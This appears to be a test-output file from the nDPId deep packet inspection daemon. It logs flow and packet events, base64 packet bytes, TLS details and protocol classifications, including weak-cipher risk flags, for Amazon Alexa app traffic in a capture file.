-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} 
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085829,"flow_last_seen":1490976085829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085829,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1490976085829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085829,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8qZ1AAEAGnVGsECrYNF7ohrKIAbvGQPZJAAAAAKAC\/\/+CmQAAAgQFtAQCCAoA9l\/UAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085832,"flow_last_seen":1490976085832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085832,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1490976085832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085832,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k2FAAEAGs42sECrYNF7ohrKJAbv5cMy2AAAAAKAC\/\/94+AAAAgQFtAQCCAoA9l\/XAAAAAAEDAwg="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085883,"flow_last_seen":1490976085883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085883,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1490976085883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085883,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/VAAEAGPiSsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/94MQAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085884,"flow_last_seen":1490976085884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1490976085884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA83c5AAEAGaSCsECrYNF7ohrKLAbvdeYISAAAAAKAC\/\/\/fjAAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085891,"flow_last_seen":1490976085891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085891,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1490976085891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085891,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8K1lAAEAGbNGsECrYwKgLAZYiH5Cn8nSEAAAAAKAC\/\/9ycAAAAgQFtAQCCAoA9l\/dAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} 
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088631,"flow_last_seen":1490976088631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1490976088631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088631,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NFtAAEAGEpSsECrYNF7ohrKOAbuEplS0AAAAAKAC\/\/9kqAAAAgQFtAQCCAoA9mDvAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} 
